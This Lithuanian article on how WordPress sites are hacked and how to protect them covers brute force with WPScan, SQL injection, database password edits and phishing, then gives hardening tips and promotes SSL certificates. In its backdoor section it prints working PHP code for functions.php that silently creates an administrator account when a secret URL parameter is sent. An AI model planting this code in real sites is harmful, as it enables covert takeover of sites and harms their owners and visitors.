Kaip nulaužti WordPress?

Įvadas

Prieš pradėdami šį straipsnį, norėtume, kad žinotumėte, jog įsilaužimas yra neteisėtas ir mes nemotyvuojame ir neskatiname jokios piktavališkos veiklos. Šis straipsnis skirtas tik tam, kad sužinotumėte, kaip veikia sukčiai ir kaip įvairūs svetainių saugumo metodai yra būtini norint juos sulaikyti. Aptarkime:

• Kaip sukčiai įsilaužia į "WordPress"?
• Kaip apsaugoti WP svetainę nuo sukčių?

Taigi, nieko nelaukdami pradėkime šią temą.

Kaip nulaužti WordPress svetainę internete?

(Šaltinis: wpsecurityninja.com)

WPScan naudojimas:

WPScan yra WP saugumo skeneris, kuris padeda svetainių savininkams patikrinti savo "WordPress" svetainę dėl pažeidžiamumų, tačiau šį skenerį taip pat naudoja įsilaužėliai, norėdami patenkinti savo motyvus įsilaužti į svetaines.

WPScan leidžia svetainių savininkams ir administratoriams nurodyti WP naudotojų paskyras ir brutalios jėgos slaptažodžius ir yra svarbiausias žingsnis įgyjant neteisėtą prieigą prie WP paskyrų.

(Brute force naudotojo vardo ir slaptažodžio nustatymas naudojant WPScan. Šaltinis: Medium)

MIM atakos:

Jei naudotojai naudojasi panašiais LAN tinklais, galima lengvai įvykdyti "Man-in-middle" (MIM) atakas. Nešifruoti naudotojų prisijungimai yra lengvas taikinys, nes visa informacija matoma atviru tekstu.

Tokio tipo atakoms vykdyti naudojama programinė įranga gali nustatyti pažeistas temas, įskiepius ir suskaičiuoti naudotojus.

(Šaltinis: Medium)

SQL injekcijos:

SQL injekcijos atakos laikomos svarbiausiomis atakomis, naudojamomis įsiskverbiant į svetaines. Šios atakos nukreiptos į svetainės galinius vartus ir leidžia įsilaužėliams prasiskverbti į juos įgyvendinant pažeistas komandas.

(Šaltinis: secure.wphackedhelp.com)

Dėl šių įsiskverbimų įsilaužėliai taip pat gali keisti duomenų bazes ir komandas, ištrinti arba pavogti svetainės informaciją.

Kadangi šiomis SQL atakomis nustatomos pažeidžiamos ir neatnaujintos svetainės, įsilaužimo užduotis tampa lengva ir sėkminga.

Naudojant "My SQL/cPanel":

Taikydami šį metodą įsilaužėliai sukuria netikrą paskyrą arba pakeičia esamo WP svetainės naudotojo slaptažodį. Įsilaužėliai bando įsilaužti per "cPanel", atidarydami "PhpMyAdmin". Jie ieško lentelės, kurios galūnė _users, ir suranda naudotoją, kurį nori pakeisti.

Taip jie galės pakeisti naudotojo, į kurį planuoja įsilaužti, prisijungimo duomenis. Jie atsekė naudotoją ir pakeitė jo slaptažodį (iš lauko user_pass), atidarydami internetinį MD5 generatorių ir pakeisdami jį savo norimu, o vėliau spustelėdami #.

(Vartotojų vardai, vartotojų slaptažodžiai, jų el. pašto ID ir kt. saugomi duomenų bazės lentelėje wp_users. Šaltinis: firstsiteguide.com)

Vartotojų vardai, slaptažodžiai, jų el. pašto ID ir kt. saugomi duomenų bazės lentelėje wp_users.

Redaguoti Functions.php:

Įsilaužėliai taip pat gali prisijungti prie cPanel ir pakeisti Functions.php failą. Atrakinę failų tvarkyklę, jie ieško aktyvios temos aplanko. Iš aplanko public_html/wp_content/themes jie atsekė temą ir redaguoja functions.php, įdėdami savo sukompromituotą kodą. Įsilaužimas jau vyksta, nes įsilaužėliai sukūrė naują paskyrą. Tai padarę, jie ištrina sukompromituotą kodą.

Sukurkite naują naudotojo paskyrą per FTP:

Paprastai FTP paskyros padeda svetainių savininkams savo svetainėje sukurti katalogą, į kurį tam tikri naudotojai gali įkelti ir (arba) atsisiųsti failus naudodami savo prisijungimo duomenis.

Šie failai taip pat peržiūrimi internete.

FTP paskyros sukūrimo svetainėje žingsniai:

• Įveskite norimus duomenis
• Įveskite naujojo FTP naudotojo vartotojo vardą
• Įveskite slaptažodį paskyrai, skirtai prieigai per FTP
• Įveskite katalogo pavadinimą, prie kurio suteikiama prieiga per FTP
• Įrašykite norimą MB vietą, kurią norite skirti šiam aplankui
• Vėliau paspauskite mygtuką " Sukurti ", kad sukurtumėte naują paskyrą.

Toliau nurodytus duomenis turi įkelti naujasis naudotojas, norėdamas gauti prieigą per FTP.

Adresas / Host Name / Adresas: yourdomain.com arba ftp.yourdomain.com Vartotojas / Vartotojas: [email protected] Slaptažodis: El slaptažodis, priskirtas šiai FTP paskyrai

Prievadas: 21Pavadinkite aplanką, skirtą failams įkelti / atsisiųsti.

Naujasis naudotojas turės skaitymo ir rašymo teises tiek pasirinktame kataloge, tiek visuose jame esančiuose pakatalogiuose. Pavyzdžiui, jei sukursite kliento naudotoją ir suteiksite jam prieigą prie / home / user / public_html

Skverbimasis per galines duris:

Piktavališkas būdas įsiskverbti į svetainę yra per galines duris. Ar tai būtų sukčius, norintis patekti į jūsų svetainę, ar nukentėjęs naudotojas, norintis susigrąžinti prieigą prie savo svetainės per užpakalinių durų įėjimą, abu jie turi atlikti toliau nurodytus veiksmus.

Tais atvejais, kai per FTP sukuriama nauja naudotojo paskyra arba atliekamas slaptažodžio atkūrimas, bet tai neduoda norimų rezultatų, naudotojas gali norėti įsilaužti į savo svetainę per užpakalinių durų įrašą ir atgauti administratoriaus prieigą.

Žingsniai, kaip sukurti užpakalines duris:

• Atidarykite functions.php failą ir įklijuokite toliau nurodytą kodą.

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>

• Vėliau išsaugokite pakeitimus.

Crypto Jacking & Cryptocurrency Mining:

Dėl kriptovaliutų populiarumo atsirado naujų kibernetinių grėsmių, pavyzdžiui, kriptovaliutų vagystė, dar vadinama kriptovaliutų kasybos kenkėjiška programine įranga.

Kompiuterio konfiskavimas prieš naudotojo valią ir sąmoningumą vadinamas kriptovaliutų vagyste. Kriptograužimo kenkėjiškų programų atveju sukčiai užkrečia naudotojo kompiuterį kenkėjiškomis programomis, perduodamomis per programinę įrangą, skirtą sistemoms ir tinklams pažeisti.

"Phishing":

"Phishing" - tai būdas, kai sukčiai, apsimesdami juridiniais asmenimis, iš naudotojų išvilioja jų jautrią informaciją (prisijungimo duomenis, socialinės paskyros numerį, PIN kodą, kredito kortelės duomenis ir kt.). Savo tikslui įgyvendinti jie paprastai naudoja elektroninius laiškus.

Pavyzdys: Sukčius gali apsimesti patikimu šaltiniu ir rinkti naudotojų asmeninius duomenis, kad išpildytų savo norus. Be to, į sukčiavimo el. laišką jis gali įdėti blogą nuorodą ir nukreipti į kokią nors apgaulingą svetainę, kad pristatytų kenkėjišką programinę įrangą.

Kenkėjiška programinė įranga:

"WordPress" saugumo statistika rodo, kad 4000 WP svetainių yra užkrėstos kenkėjiškomis programomis dėl suklastotų SEO įskiepių.

Sukčiams nereikia šaltinio kenkėjiškai programinei įrangai pristatyti. SEO įskiepiai, WP temos ir daugelis kitų svetainėje esančių veiksnių paskatino įsilaužėlius naudoti neseniai WP-VCD kenkėjišką programinę įrangą.

Netgi apgaulingi el. laiškai yra vartai kenkėjiškoms programoms pristatyti.

Ir šiuo atveju įsilaužėlių šūkis yra tas pats, t. y. įsiskverbiant į sistemas ir vagiant informaciją iš naudotojų gauti slaptų duomenų.

WordPress išpirkos reikalaujanti programinė įranga:

WP išpirkos reikalaujančių programų atveju programišiai naudoja kenkėjišką programinę įrangą, kad užblokuotų naudotojų prieigą prie sistemų ir tinklų. Vartotojas gali ją atgauti sumokėjęs įsilaužėlio reikalaujamą išpirką.

Pavyzdys: Petya ataka, kai įsilaužėlis užšifruoja jūsų failus ir duomenis ir reikalauja išpirkos už dešifravimo raktą.

Kryžminio svetainės užrašymo (XSS) ataka:

XSS atakas įsilaužėliai vykdo į svetainę įterpdami kenkėjišką turinį ir taip išnaudodami naršyklę. Ši ataka leidžia įsilaužėliui pavogti slapukų duomenis, pakeisti svetainės turinį ir užvaldyti svetainę, kad gautų slaptus duomenis.

Paspaudimų perėmimas:

Spragtelėjimo atveju įsilaužėlis kenkėjiškai bando sukompromituoti mygtuką / nuorodą ir motyvuoja naudotoją spustelėti sukompromituotą objektą. Tai leidžia įsilaužėliui įvykdyti kenkėjiškas komandas ir gauti prieigą prie naudotojui jautrių duomenų.

Spoofing:

"Spoofing" - tai ataka, kai asmuo apsimeta patikimu asmeniu, kad gautų neteisėtos naudos iš naudotojo ir apgaule priverstų jį pateikti savo konfidencialią informaciją.

Kad išvengtumėte visų šių įsilaužimo atakų, WP svetainei apsaugoti reikia imtis specialių saugumo priemonių.

Kaip apsaugoti "WordPress" svetainę nuo įsilaužimo?

(Šaltinis: envisagedigital.co.uk)

Pirmiau pateiktos statistikos pakanka, kad būtų galima spręsti apie "WordPress" populiarumą. Būtent dėl šio populiarumo ši TVS platforma tampa dar geidžiamesnė įsilaužėliams, kurie bando įvairiais įsilaužimo būdais patekti į WP svetaines ir jų duomenis.

Todėl labai svarbu žinoti, kaip užkirsti kelią įsilaužėliams patekti į jūsų WP svetainę.

Apsaugokite savo WP svetainę naudodami SSL sertifikatą:

Kai į svetainę įkeliami bet kokie duomenys, jie visada pateikiami atviru tekstu, kuris yra lengvai matomas visiems, įskaitant įsilaužėlius. Tai gali būti rizikinga, nes įsilaužėliai gali piktnaudžiauti jūsų svetainės duomenimis.

SSL (Secure Socket Layers ) sertifikatai - tai skaitmeniniai sertifikatai, padedantys apsaugoti jūsų WP svetainę 256 bitų šifravimo saugumu ir paverčiantys jūsų svetainės duomenis koduotu formatu.

Įsilaužėliai negali perskaityti kodų, nors ir gavo prieigą prie jūsų svetainės, todėl jie priversti palikti tokias svetaines.

(Šaltinis: clickssl.net)

Pasirinkite norimo prekės ženklo SSL sertifikatą (Comodo, Thawte, RapidSSL ir kt.) ir jį įdiekite WP svetainėje. Kalbant apie SSL sertifikato tipą, reikia suprasti domenus ir subdomenus. Pavyzdžiui, jei jūsų WP svetainėje yra subdomenų, tuomet vienas pigus "Wildcard" sertifikatas, kainuojantis vos 45 USD per metus, gali apsaugoti visą jūsų skaitmeninį verslą.

Greitas išdavimas, 2048 bitų rakto šifravimas, SEO optimizavimas, svetainės pasitikėjimo antspaudas, 99 % naršyklių ir mobiliųjų įrenginių suderinamumas, grąžinimo politika ir garantija - tai tik kelios "Wildcard" SSL sertifikatų įdiegimo ypatybės ir privalumai.

Įvairūs prekių ženklai ir SSL produktų parinktys, palankios kainos ir puikus klientų aptarnavimas - tai tik keletas privalumų, kuriuos galima įgyti kreipiantis į ClickSSL parduotuvę, kad apsaugotumėte savo WP svetainę.

Atnaujinkite savo darbuotojus:

Žmogiškosios klaidos gali būti pražūtingos, todėl visada pasirūpinkite, kad darbuotojai būtų informuojami apie naujausias kibernetines grėsmes ir išvengtų pažeidžiamumo.

Jei jūsų darbuotojai gali nustatyti įtartinus įsilaužimo į svetainę signalus pradiniame etape, jie gali apie tai pranešti atitinkamoms institucijoms ir apsaugoti svetainę bei verslą nuo tolesnės žalos.

Naudokite dviejų veiksnių autentifikavimą (2FA):

2FA įdiegimas prisijungiant prie svetainės yra svarbiausias būdas apsisaugoti nuo brutalios jėgos atakų. Jos ne tik suteikia dar vieną saugumo lygį, bet ir apsaugo svetainės ir naudotojo duomenis.

Taip yra todėl, kad jei pažeidžiamas vienas saugumo sluoksnis, sukčiui reikia įsilaužti į antrąjį sluoksnį, kad galėtų patekti į svetainę.

Tai sudėtinga užduotis, todėl daugeliu atvejų sukčiai galiausiai persikelia į kitas prastai apsaugotas svetaines.

Patarimas: WP 2FA yra nemokamas WP įskiepis, kuris suteikia WP svetainei papildomą saugumo lygį.

Reguliariai atlikite administratoriaus naudotojų auditą:

Tai svarbu jūsų WP svetainės saugumui užtikrinti. Užtikrinkite, kad reguliariai tikrintumėte savo administratoriaus naudotojus ir kryžminiu būdu tikrintumėte jų prieigas.

Taip pat užtikrinkite, kad naudotojai ir darbuotojai turėtų ribotą prieigą pagal savo užduotis, kad būtų išvengta saugumo spragų.

Reguliariai atnaujinkite "WordPress Core":

Nežinote apie WP Core?

Leiskite man trumpai jums, kad WP Core apima visus pagrindinius pagrindinius failus, reikalingus WP dirbti.

WP zip failo, atsisiųsto iš WordPress.org, failų sąrašas

(Šaltinis: ithemes.com)

Šie pagrindiniai failai turi būti reguliariai atnaujinami po saugumo atnaujinimų išleidimo, kad būtų ištaisytos visos saugumo spragos.

Atsisiųsti WP temas ir įskiepius iš patikimų šaltinių:

Tai labai svarbu, nes įskiepiai gali kelti grėsmę, jei jie neatnaujinami arba įdiegiami iš nepatikimų šaltinių. Jei naudojate nemokamus ir (arba) mokamus įskiepius, visada patikrinkite toliau nurodytus veiksnius, pvz:

• Vartotojų vertinimai ir apžvalgos
• Patogumas naudotojui
• Suderinamumas
• Apsauga
• Patikimumas

(Šaltinis: torquemag.io)

Ta pati taisyklė galioja ir diegiant WP temas.

Reguliariai atnaujinkite WP temas ir įskiepius:

Pasenusios ar pasibaigusios WP temos ir įskiepiai visada kelia grėsmę jūsų WP svetainei, nes jie praranda savo saugumo standartus. Kad įsilaužėliai nesinaudotų tokiais vartais kenkėjiškoms programoms platinti ir gauti prieigą prie svetainės, reguliariai atnaujinkite WP svetainėje naudojamas temas ir įskiepius.

Tai padės įskiepiui tinkamai veikti ir būti sinchronizuotam su naujausiomis WP versijomis.

Patarimas: Įskiepių puslapyje galite peržiūrėti visus įdiegtus įskiepius ir šalia kiekvieno įskiepio esančią nuorodą "Įjungti automatinį atnaujinimą". Įjunkite ją, kad galėtumėte automatiškai atnaujinti.

Pakeiskite numatytąjį administratoriaus vardą:

Įsilaužėliai yra pernelyg gudrūs ir gali lengvai įsiskverbti į jūsų WP svetainę naudodami numatytąjį administratoriaus vardą. Visada verčiau pakeisti numatytąjį administratoriaus vardą, kad įsilaužėliai negalėtų vykdyti "brute-force" atakų ir gauti neteisėtą prieigą prie jūsų svetainės.

Suteikti ribotą prieigą:

Niekada nesuteikite daugiau, nei reikia, ir ta pati taisyklė taikoma suteikiant prieigą prie svetainės naudotojams ir darbuotojams.

Prieigos kontrolė yra svarbiausia svetainės ir duomenų saugumo taisyklė, nes ji apibrėžia, kas gali ar negali prisijungti prie svetainės. Užblokuokite visus įėjimus į WP administratoriaus ir kitus svarbius kodus bei duomenis, kad užtikrintumėte svetainės saugumą.

Apribota prieiga ne tik padidina produktyvumą, bet ir apsaugo svetainę nuo kenkėjiškų įrašų.

Atnaujinti "WordPress":

Kai "WordPress" neatnaujinamas, kyla pavojus, kad į jūsų svetainę gali įsilaužti programišiai.

"WordPress" užima 37 % rinkos dalies ir reguliariai išleidžia atnaujinimus, kad ištaisytų saugumo spragas ir klaidas. Šiuose atnaujinimuose taip pat pateikiamos naujos funkcijos ir patobulintos esamos, kurios naudingos jūsų svetainės našumui didinti.

(Šaltinis: wpbeginner.com)

Nuolat atnaujinkite WP svetainę, kad užtikrintumėte patikimą saugumą.

Apibendrinimas:

Naudokite stiprius ir sudėtingus slaptažodžius ir nuolat atnaujinkite WP svetainę, įskiepius ir temas, kad ištaisytumėte visas saugumo spragas. Skirkite laiko darbuotojų švietimui, nes tai visada padės išvengti nelaimių.

Niekada nesirūpinkite saugumu ir visada naudokite geriausius ir patikimiausius saugumo įskiepius, kad jūsų WP svetainė būtų apsaugota nuo smalsių akių. Be to, apsaugokite svetainę SSL, kad padidintumėte klientų pasitikėjimą, sustiprintumėte verslą ir SEO.

Dabar, kai žinote, kaip veikia įsilaužėliai, tikimės, kad šis straipsnis padės jums užkirsti kelią įsilaužėliams prasiskverbti į jūsų svetainę ir saugiai valdyti WP svetainę.